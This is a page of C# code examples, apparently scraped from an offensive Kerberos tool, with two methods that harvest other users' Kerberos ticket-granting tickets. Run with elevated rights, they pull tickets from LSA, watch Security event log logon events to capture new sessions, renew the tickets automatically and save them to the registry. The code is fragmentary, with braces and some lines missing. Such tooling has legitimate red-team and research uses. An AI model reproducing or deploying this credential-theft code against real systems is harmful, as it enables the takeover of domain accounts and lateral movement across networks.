Ejemplo n.º 1
Ejemplo n.º 2
        public static void HarvestTGTs(int intervalMinutes, string registryBasePath)
            // First extract all TGTs then monitor the event log (indefinitely) for 4624 logon events
            //  every 'intervalMinutes' and dumps TGTs JUST for the specific logon IDs (LUIDs) based on the event log.
            // On each interval, renew any tickets that are about to expire and refresh the cache.
            // End result: every "intervalMinutes" a set of currently valid TGT .kirbi files are dumped to console

            if (!Helpers.IsHighIntegrity())
                Console.WriteLine("\r\n[X] You need to have an elevated context to dump other users' Kerberos tickets :( \r\n");

            Console.WriteLine("[*] Action: TGT Harvesting (w/ auto-renewal)");
            Console.WriteLine("\r\n[*] Monitoring every {0} minutes for 4624 logon events\r\n", intervalMinutes);

            // used to keep track of LUIDs we've already dumped
            var seenLUIDs = new Dictionary <ulong, bool>();

            // get the current set of TGTs
            List <KRB_CRED> creds = LSA.ExtractTGTs(new Interop.LUID());

            while (true)
                // check for 4624 logon events in the past "intervalSeconds"
                string         queryString = String.Format("*[System[EventID=4624 and TimeCreated[timediff(@SystemTime) <= {0}]]]", intervalMinutes * 60 * 1000);
                EventLogQuery  eventsQuery = new EventLogQuery("Security", PathType.LogName, queryString);
                EventLogReader logReader   = new EventLogReader(eventsQuery);

                for (EventRecord eventInstance = logReader.ReadEvent(); eventInstance != null; eventInstance = logReader.ReadEvent())
                    // if there's an event, extract out the logon ID (LUID) for the session
                    string   eventMessage = eventInstance.FormatDescription();
                    DateTime eventTime    = (DateTime)eventInstance.TimeCreated;

                    int    startIndex = eventMessage.IndexOf("New Logon:");
                    string message    = eventMessage.Substring(startIndex);

                    // extract out relevant information from the event log message
                    var   acctNameExpression   = new Regex(string.Format(@"\n.*Account Name:\s*(?<name>.+?)\r\n"));
                    Match acctNameMatch        = acctNameExpression.Match(message);
                    var   acctDomainExpression = new Regex(string.Format(@"\n.*Account Domain:\s*(?<domain>.+?)\r\n"));
                    Match acctDomainMatch      = acctDomainExpression.Match(message);

                    if (acctNameMatch.Success)
                        var   srcNetworkExpression = new Regex(string.Format(@"\n.*Source Network Address:\s*(?<address>.+?)\r\n"));
                        Match srcNetworkMatch      = srcNetworkExpression.Match(message);

                        string logonName         = acctNameMatch.Groups["name"].Value;
                        string accountDomain     = "";
                        string srcNetworkAddress = "";
                            accountDomain = acctDomainMatch.Groups["domain"].Value;
                        catch { }
                            srcNetworkAddress = srcNetworkMatch.Groups["address"].Value;
                        catch { }

                        // ignore SYSTEM logons and other defaults
                        if (!Regex.IsMatch(logonName, @"SYSTEM|LOCAL SERVICE|NETWORK SERVICE|UMFD-[0-9]+|DWM-[0-9]+|ANONYMOUS LOGON", RegexOptions.IgnoreCase))
                            Console.WriteLine("\r\n[+] {0} - 4624 logon event for '{1}\\{2}' from '{3}'", eventTime, accountDomain, logonName, srcNetworkAddress);

                            var   expression2 = new Regex(string.Format(@"\n.*Logon ID:\s*(?<id>.+?)\r\n"));
                            Match match2      = expression2.Match(message);

                            if (match2.Success)
                                    // check if we've seen this LUID before
                                    Interop.LUID luid = new Interop.LUID(match2.Groups["id"].Value);
                                    if (!seenLUIDs.ContainsKey((ulong)luid))
                                        seenLUIDs[luid] = true;
                                        // if we haven't seen it, extract any TGTs for that particular logon ID and add to the cache
                                        List <KRB_CRED> newCreds = LSA.ExtractTGTs(luid);
                                catch (Exception e)
                                    Console.WriteLine("[X] Exception: {0}", e.Message);

                for (int i = creds.Count - 1; i >= 0; i--)
                    DateTime endTime   = TimeZone.CurrentTimeZone.ToLocalTime(creds[i].enc_part.ticket_info[0].endtime);
                    DateTime renewTill = TimeZone.CurrentTimeZone.ToLocalTime(creds[i].enc_part.ticket_info[0].renew_till);

                    // check if the ticket is going to expire before the next interval checkin
                    if (endTime < DateTime.Now.AddMinutes(intervalMinutes))
                        // check if the ticket's renewal limit will be valid within the next interval
                        if (renewTill < DateTime.Now.AddMinutes(intervalMinutes))
                            // renewal limit under checkin interval, so remove the ticket from the cache
                            // renewal limit after checkin interval, so renew the TGT
                            string userName   = creds[i].enc_part.ticket_info[0].pname.name_string[0];
                            string domainName = creds[i].enc_part.ticket_info[0].prealm;

                            Console.WriteLine("[*] Renewing TGT for {0}@{1}", userName, domainName);
                            byte[]   bytes       = Renew.TGT(creds[i], false, "", false);
                            KRB_CRED renewedCred = new KRB_CRED(bytes);
                            creds[i] = renewedCred;

                Console.WriteLine("\r\n[*] {0} - Current usable TGTs:\r\n", DateTime.Now);
                if (registryBasePath != null)
                    LSA.SaveTicketsToRegistry(creds, registryBasePath);

                Thread.Sleep(intervalMinutes * 60 * 1000);
Ejemplo n.º 3
        public void HarvestTicketGrantingTickets()
            if (!Helpers.IsHighIntegrity())
                Console.WriteLine("\r\n[X] You need to have an elevated context to dump other users' Kerberos tickets :( \r\n");

            // get the current set of TGTs
            while (true)
                // extract out the TGTs (service = krbtgt_ w/ full data, silent enumeration
                List <LSA.SESSION_CRED> sessionCreds   = LSA.EnumerateTickets(true, new LUID(), "krbtgt", this.targetUser, null, true, true);
                List <KRB_CRED>         currentTickets = new List <KRB_CRED>();
                foreach (var sessionCred in sessionCreds)
                    foreach (var ticket in sessionCred.Tickets)

                if (renewTickets)
                    // "harvest" mode - so don't display new tickets as they come in
                    AddTicketsToTicketCache(currentTickets, false);

                    // check if we're at a new display interval
                    if (lastDisplay.AddSeconds(this.displayIntervalSeconds) < DateTime.Now.AddSeconds(1))
                        this.lastDisplay = DateTime.Now;
                        // refresh/renew everything in the cache and display the working set
                        Console.WriteLine("[*] Sleeping until {0} ({1} seconds) for next display\r\n", DateTime.Now.AddSeconds(displayIntervalSeconds), displayIntervalSeconds);
                        // refresh/renew everything in the cache, but don't display the working set
                    // "monitor" mode - display new ticketson harvest
                    AddTicketsToTicketCache(currentTickets, true);

                if (registryBasePath != null)
                    LSA.SaveTicketsToRegistry(harvesterTicketCache, registryBasePath);

                if (runFor > 0)
                    // compares execution start time + time entered to run the harvest for against current time to determine if we should exit
                    if (collectionStart.AddSeconds(this.runFor) < DateTime.Now)
                        Console.WriteLine("[*] Completed running for {0} seconds, exiting\r\n", runFor);

                // If a runFor time is set and the monitoring interval is longer than the time remaining on the run,
                // the sleep interval will be adjusted down to however much time left in the run there is.
                if (runFor > 0 && collectionStart.AddSeconds(this.runFor) < DateTime.Now.AddSeconds(monitorIntervalSeconds))
                    TimeSpan t = collectionStart.AddSeconds(this.runFor + 1) - DateTime.Now;
                    Thread.Sleep((int)t.TotalSeconds * 1000);
                // else we'll do a normal monitor interval sleep
                    Thread.Sleep(monitorIntervalSeconds * 1000);